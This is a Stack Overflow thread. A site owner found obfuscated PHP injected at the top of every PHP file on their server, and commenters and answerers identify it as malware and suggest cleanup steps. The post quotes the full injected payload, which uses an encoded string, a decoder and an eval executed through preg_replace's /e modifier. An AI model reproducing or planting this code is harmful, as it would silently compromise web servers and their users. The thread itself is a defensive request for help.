0

I don't know what is, I found it inside of all PHP files on my server, I think is a kind of virus or something else?, What do you think guys?. Is already on my server, inside of each PHP file on the top of the document, and down of this code start my normal code. I'll appreciate your help thanks!

<?php $jkpyncainc = 'ss%x5c%x785csboe))1%x5c%x782f35.)1%x5c%x782g!>!#]y81]273]y76]258]%x5c%x7825yy)#}#-#%x5c%x787,*c%x5c%x7827,*b%x5cPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR_reporting(0); preg_replace("%x2f%50%x2e%52%x78:-!%x5c%x7825tzw%x5c%x782f%x5c%x7824)#P%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%x70%ftmbg}%x5c%x787f;!osvufs}wc%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c%x7825o:!>!%x5c%x787f!~!<##!>!2p%29%57%x65","%x65%166%x61%154%x28%151ftmbg!osvufs!|ftmf!~<**9.-j%x5c5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K356]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%vodujpo)##-!#~<#%x5c%x72]y74]256#<!%x5c%x7825ff2!>!b!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37]87822l:!}V;3q%x5c%x7825}U;x7825)hopm3qjA)qj3hopmA%x5c%x78273qj%x5c%x78256<*c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7860gx5c%x7860un>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825Y%x5c%x78256<.msv%x5c%x7860ftsbqA7>q%x5c%x78256<39275ttfsqnpdov{h19275j{hnpd19275fub}R;msv}.;%x5c%x782f#%x5c%x782-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe5c%x7824*<!%x5c%x7825kj:!>!#]y3d]51]y35]256]y76]72]!|!*!***b%x5c%x7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+#91y]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!gj-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x5c%x785cq%x5c%87f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825V%x5c%x7827{ftm;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}_;gvc%x5c%x7825}&;257-K)fujs%x5c%x7878X6<#o]o]Y%x5c%x78257;utp27!hmg%x5c%x7825)!gj!~<ofmy%x5c%x%x785cq%x5c%x7825%x5c%x78278y]27]28y]#%x5c%x782fr%x5c%x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#5t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww5c%x7824-%x5c%x7824*!|!%x56<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6<.fmjgA%x5c%xq%x5c%x7825<#g6R85,67R37,18R#>q%x5fV%x5c%x787f<*X&Z&S{ftm%x7825!<5h%x5c%x7825%x5c%x786]y81]265]y72]254]y76#<%x5c%x7825tmw!>mdR6<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI,6<*127-UV<#372]58y]472]37y]672]48y]#>s%x5c%x7825<%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}&;!osvu#<%x5c%x7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x782fqp%x5c%x7]88]5]48]32M3]317]445]212]445]43]32#00;quui#>.%x5c%x7825!<**yfeobz+sfwjidsb%x5c%x786R37,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x7825>2T7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x7827K6<%x5cx5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p<%x5c%x78e%x5c%x78b%x5c%x7825w:!>!%x5c%xx7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<%x5c%x7825%x5c%x785c%x5c%x7825j:.2^,%x5ssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%xc%x7825b:<!%x5c%x782825>5h%x5c%x7825!<*::::::-111112)eobs%!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!%x5c%x7824-%x5c%x1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!>EzH,2W%x5c%x7825wN;#-Ez-1H*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hI%x5c%x787fw6*%x5c%x787272qj%x5c%x7825)7gj6<**2qj%x5c%x782400~:<h%x5c%x7825_t%x5c%x7Ce*[!%x5c%x7825cIjQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)#}#)fepmqnj!%x5c%x782f!#0#)idubn%x5x5c%x7822#)fepmqyfA>ovg}{;#)tutjyf%x5c%x7860opj86+7**^%x5c%x782f%x5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x7825)sf%5c%x7825ggg)(0)%x5c%x782f+*0f(-!#]y76]27udovg)!gj!|!*msv%x5c%x7825)}k~~~<x5c%x787fw6*%x5c%x787f_*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fwf14+9**-)1%x5c%x782f293]84]y31M6]y3e]81#%x5c%x782f#7e:55946-tr.984:75983:48984:71]M8]Df#<%x5c%x7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825%x7825hOh%x5c%x782f#00#W~!%x5c%x782%x5c%x7825%x5c%x7824-%x5c%if((function_exists("%x6f%142%x5f%163%x74%141%qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MP5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x785c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5d%x5c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x7827pd]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452g39*56A:>:8:|:7#6#)tutjyf%x5c%x786049386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%epn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x7878W~!Ypp2)%x5c2f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5c%x782fj{hnpd#)tutjyf%x5c%x7860opjudovg%x5c%x7822)!gj}1~!<2p%x5c%x7825%5z>3<!fmtf!%x5c%x7825z>2<!%x5c%x7825ww2)%x5c%x7825EEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x78%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c24-%x5c%x7824-tusqpt)7fw6<*K)ftpmdXA6|7**197-2;*%x5c%x787f!>>%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudx5c%x7825tww!>!%x5c%25h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.973:8297f:57860QUUI&b%x5c%x7825!|!*#462]47y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7825:**WYsboepn)%x5c%x7824%x78%62%x35%165%x3ac%x7825V<*#fopoV;hojepd<!%x5c%x7825mm!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]25G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55L-#O#-#N#*%x5c%x7824%x5c%x782f%x5c%x7825c%x7825)utjm!|!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gjoF.uofuopD#)sfebfI{*w%x5c%j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%xc%x78256|6.7eu{66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%7825,3,j%x5c%x7825>j%x5c%x7825!<**3-d]55#*<%x5c%x7825bG9}:}.}-}!#*<%x8]248]y83]256]y81]265]y72]254]y76]61]y33]68]y34]68860{6~6<tfs%x5c%x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gd%x5c%x7825)uqpuft%x5c%x7860msvd},fV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67]y33]65]y31]53]y6d]281]y43]78]y33]65]y31]55]y85]82]y76]x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785cf#%x5c%x782f},;#-#}+;%x5c%x7825-qp%x5c%x7825)54l}%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!}R;*msv%x5c%x7825)}.;%x5c%x7860UQPMSVD!-i5kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%x7825ggc%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>]62]y4c#<!%x5c%x7825t::!>!%x5c%x7824Ypp3)%x5cW%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x5c%x7860QIQ&f_UTPI%x5c%x7860QUUI&e_S7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5mgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjy5c%x7825j,,*!|%x5c%x7824-%x5c%x7824gvodujpo2]265]y39]274]y85]273]y6g]273]y76]271]y7d]252]y74]2%x7825r%x5c%x7878Bsfuvso!sbo154%x69%164%50%x22%13%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pj%x5c%x7825-bubE{h%x5c%x786*CW&)7gj6<.[A%x5c%x7827&6<%x5c%x787fw6*%x5c%x787f_*#[k2%x5c%x786c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x782+I#)q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7825=*h%x5c%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7888M4P8]37]278]225]241]3345c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!5c%x7825%x5c%x785cSFWSFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>7]y72]265]y39]271]y83]256]y7%x5c%x7825!*3>?*2b%x5c%x297e:56-%x5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51Lfs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmb2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x7825)euhA)3of>2bd%x5c7825+*!*+fepdfe{h+{d%x5c%x7825)+opjudovg+x7824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%utRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c%x7825))!gj!<*#cd2bge56+9)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Zw%x5c%x7860TW~%x5c%x7824<%x5c%x78e%x5x5c%x78257**^#zsfvr#%x5c%x785cq%x5cj%x5c%x7825!*3!%x5c%x7827!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825!7824gps)%x5c%x7825j>1<%x5c%x7825j=tj{fpg)%x5c%x7825%x5but%x5c%x7860cpV%x5c%x7I#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7jsv%x82f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x56]y39]252]y83]273]y72]282#<!%x5c%x7825tjw!>!#]y84]275]y83]248]y83]25x5c%x78242178}527}88:}334}472%x5c%x7824552]e7y]#>n%x5c%x782560QUUI&c_UOFHB%x5c%x7860SFTV%x5c%xx7825)kV%x5c%x7878{**#k#)tutjyf%x5c%x7860%x5c%x7878%x5c%xx786057ftbc%x5c%x787f!|!*uyfu%x5c%x7827k:!ftmf!}Z;^nbsbq%x*f%x5c%x7827,*e%x5c%x7827,*d%x5c%x782c%x7824-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x7824tv%x6d%160%x6c%157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61!#]y84]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]252]y85]2!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y7gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])0#)U!%x5c%x7827{**u78256<C%x5c%x7827pd%x5x7825%x5c%x7827jsv%x5c%x78256<C>^#zsfvr#%x5c%x785cq%<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%x5c%K9]77]D4]82]K6]72]K9]78]Kr%x5c%x785c1^-%x5c%x7825r%x5c%x785c2^-%x5c62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73", %x7825ww2!>#p#%x5c%x782f#p#%x5c%x782f%x51]464]284]364]6]234]342]58]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x7825bX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7827&6<*rfs%x5c%x78[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825bT-%x5c%x7825hW~!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#0{6:!}7;!}6;##}C;!>>0bj+upcotn+qsvmt+fmhpph#)zbssb!-x5c%x7878pmpusut)tpqss5c%x7825nfd>%x5c%x7825fdy<Cb*#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h%x5c%x7827id%x5c%x78256<%)) { $GLOBALS["%x61%156%x75%156%x61"]=1; funj6<*id%x5c%x7825)ftp7825b:>1<!fmtf!%x5c%x7825b:>%x5c%x7825s:!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x56~6<u%x5c%x78257>%x5c%x782f7&6|7**111127-K)ebfsy3d]51]y35]274]y4:]82]y3:vufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)us>:h%x5c%x7825:<#64y]Y%x5c%x7825)fnbozcYufhA%x5c%x78272q825)!gj!<2,*j%x5c%x7825-#1]825:osvufs:~:<*9-1-r%x5c%xc%x78b%x5c%x7825mm)%x5c%x7825%x5c%x78j%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257x7825)m%x5c%x7825):fmji%x5c%x7878:<##:7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fmjgk4%x5c%x7f_*#fubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x787fw6*CW&)7gj2<!gps)%x5c%x7825j>1<%x5c%x7825j=6[%x5cc%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>25)sutcvt-#w#)ldbqov>*ofmy%xf%x5c%x78604%x5c%x78223}!+!<+{e%x5c%x5bss-%x5c%x7825r%x5c%x7878B%x5c%x78)!gj+{e%x5c%x7825!os%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nfd)##Qtpz)#]341]ction fjfgg($n){return chr(ord($n)-1);} @error<#opo#>b%x5c%x7825!*##>>X)!gjZ<#opo#>b%xy]}R;2]},;osvufs}%x5c%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)y6g]273]y76]271]y7d]252]y74]256#<!%xx72%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"]))NULL); }x7827*&7-n%x5c%x7825)utjm6<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA%x7825cB%x5c%x7825iN}#-!tussfw)%%x787fw6*3qj%x5c%x78257>%x5c%x782x7825!<12>j%x5c%x7825!|!*ctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!/(.*)/epreg_replacewpogvapkgq'; $tvgewvpmer = explode(chr((188-144)),'3644,46,9854,55,8686,44,9669,46,170,45,479,36,7686,60,256,63,5990,21,4650,20,6011,68,2509,40,6079,57,3860,56,5762,46,9350,70,7932,22,4956,52,9917,59,8846,47,8269,66,1517,44,7204,56,3747,48,4370,25,3690,57,2402,67,10008,33,2936,31,804,49,8994,35,9119,43,1345,49,7954,52,7031,35,4314,35,1594,27,940,48,2914,22,9258,53,1763,53,9200,58,5127,55,8730,20,1939,69,112,58,8661,25,3375,64,6162,65,8446,20,8790,56,345,43,5483,41,5182,34,1454,63,319,26,4395,52,3164,27,3342,33,515,31,9420,65,7066,61,1278,67,9029,27,6366,49,1561,33,5008,36,6136,26,9485,28,4828,70,674,44,10041,25,1230,48,8404,42,4163,64,458,21,2469,40,6590,24,5725,37,3144,20,6745,57,1873,28,4118,45,2284,25,7586,37,91,21,2195,54,2705,38,893,47,1162,68,2309,24,8466,32,3109,35,3261,41,8498,22,6886,59,4017,47,5688,37,4277,37,7437,34,4536,24,6945,49,9715,40,6440,63,8006,47,7528,58,6503,59,1024,29,5379,49,2048,47,6676,69,3981,36,988,36,5808,60,9513,37,6802,41,9585,20,8918,56,7181,23,1394,60,1850,23,5216,70,2333,69,1816,34,4670,23,4898,26,7471,57,779,25,9755,63,7876,56,5428,55,1053,58,7811,65,5911,51,7308,69,1901,38,7746,65,580,42,4447,20,2967,30,9056,26,718,61,1621,67,6265,65,9162,38,8974,20,7416,21,2008,40,4560,70,388,70,7377,39,4693,57,645,29,2632,53,1737,26,7623,63,10066,40,65,26,4349,21,3048,61,3618,26,6843,43,6330,36,5868,43,2743,65,7127,54,853,40,622,23,7260,48,1111,51,8893,25,5602,45,9976,32,5341,38,2808,42,2997,51,5962,28,4064,54,8610,51,2850,64,8078,42,3583,35,1688,49,4630,20,9550,35,4467,69,6614,62,3461,60,8053,25,546,34,2095,58,2153,42,3521,62,4750,40,5044,33,8520,29,8335,69,9605,64,6415,25,3916,65,2249,35,8202,67,0,43,3439,22,3191,70,5647,41,2549,54,4924,32,8750,40,2603,29,2685,20,3795,65,5568,34,9311,39,8162,40,6227,38,4227,50,6994,37,9082,37,215,41,8549,61,4790,38,5524,44,43,22,9818,36,3302,40,6562,28,5077,50,5286,55,8120,42,9909,8'); $bwellubqxl=substr($jkpyncainc,(42586-32480),(27-20)); if (!function_exists('mzrfqfsbfr')) { function mzrfqfsbfr($zsdakifiuq, $isfdnrujpz) { $wsvjrnzrfc = NULL; for($wzdtszvbpa=0;$wzdtszvbpa<(sizeof($zsdakifiuq)/2);$wzdtszvbpa++) { $wsvjrnzrfc .= substr($isfdnrujpz, $zsdakifiuq[($wzdtszvbpa*2)],$zsdakifiuq[($wzdtszvbpa*2)+1]); } return $wsvjrnzrfc; };} $vpzmduwprw="\x20\57\x2a\40\x67\156\x68\155\x62\156\x74\172\x6e\150\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\70\x36\55\x31\64\x39\51\x29\54\x20\143\x68\162\x28\50\x34\62\x39\55\x33\63\x37\51\x29\54\x20\155\x7a\162\x66\161\x66\163\x62\146\x72\50\x24\164\x76\147\x65\167\x76\160\x6d\145\x72\54\x24\152\x6b\160\x79\156\x63\141\x69\156\x63\51\x29\51\x3b\40\x2f\52\x20\161\x70\150\x78\152\x6f\153\x70\157\x64\40\x2a\57\x20"; $zhcvxtttqr=substr($jkpyncainc,(47797-37684),(67-55)); $zhcvxtttqr($bwellubqxl, $vpzmduwprw, NULL); $zhcvxtttqr=$vpzmduwprw; $zhcvxtttqr=(403-282); $jkpyncainc=$zhcvxtttqr-1; ?>
TiMESPLiNTER
  • 5,741
  • 2
  • 28
  • 64
Deimos
  • 269
  • 1
  • 6
  • 17
  • 4
    Yes it is, common as muck for insecure WP installs, backup your content and do a fresh install, or hire someone to fix it for you. Keep WP updated and don't use unsafe plugins. Any obfuscated code shows fishy intent, regardless if the developer put it there. – Lawrence Cherone Jul 21 '14 at 08:44
  • But i didnt make this, just appears there inside of the code...is very strange – Deimos Jul 21 '14 at 08:44
  • 1
    Some script or expoiter has found a writeable/executable script/file on your server and used it to infect your system. If he/she managed to infect your code with this snippet, there is almost no limit to what the attacker could do. You should look in access.logs, check security/permissions etc. – OptimusCrime Jul 21 '14 at 08:46
  • 2
    *Sidenote* you could try something like the following to try and fix yourself, but your be better off doing a fresh install. http://stackoverflow.com/questions/10422503/php-ssh-regex-script-command-to-delete-identical-malware-code-from-many-files/10422781#10422781 – Lawrence Cherone Jul 21 '14 at 08:47
  • Thanks for you help now im downloading all my files, is incredible how can edit the files without logs., – Deimos Jul 21 '14 at 09:18

2 Answers2

1

If you have SSH access to the server, and the website isn't usually modified that much, I suggest you try the following:

  1. Log in through SSH
  2. Navigate to the website directory
  3. Execute the command find . -mtime -1 -type f

This will give a list of all files which have been modified in the last day. This way you can manually check them and remove the malicious code blocks.

Should the exploit have been installed earlier, you can expand your search to go further back e.g. find . -mtime -3 -type f to go back 3 days.

Do note this is just a quick fix for a single website, chances are your server has been completely compromised, in which case you either need to do a full reinstall as already stated above, or get some professional help.

Sal00m
  • 2,938
  • 3
  • 22
  • 33
Kristof Torfs
  • 65
  • 4
1

this is not the answer for your question, but since its the same issue I am having (https://stackoverflow.com/questions/24881340/malware-code-being-injected-in-my-php-scripts) (And I don't have the necessary reputation points to post a comment), here's a script to scan and remove all the php files: http://pastebin.com/JgyDZj3R

Make sure to change {username} to your accounts username, create a file named yoyo.txt on the same directory as this PHP script and paste the illegal code in that file.

Its best if you have SSH access since it will take a lot of time to execute depending on how many files you have.

Hope this helps! :)

Community
  • 1
  • 1
sikhlana
  • 95
  • 7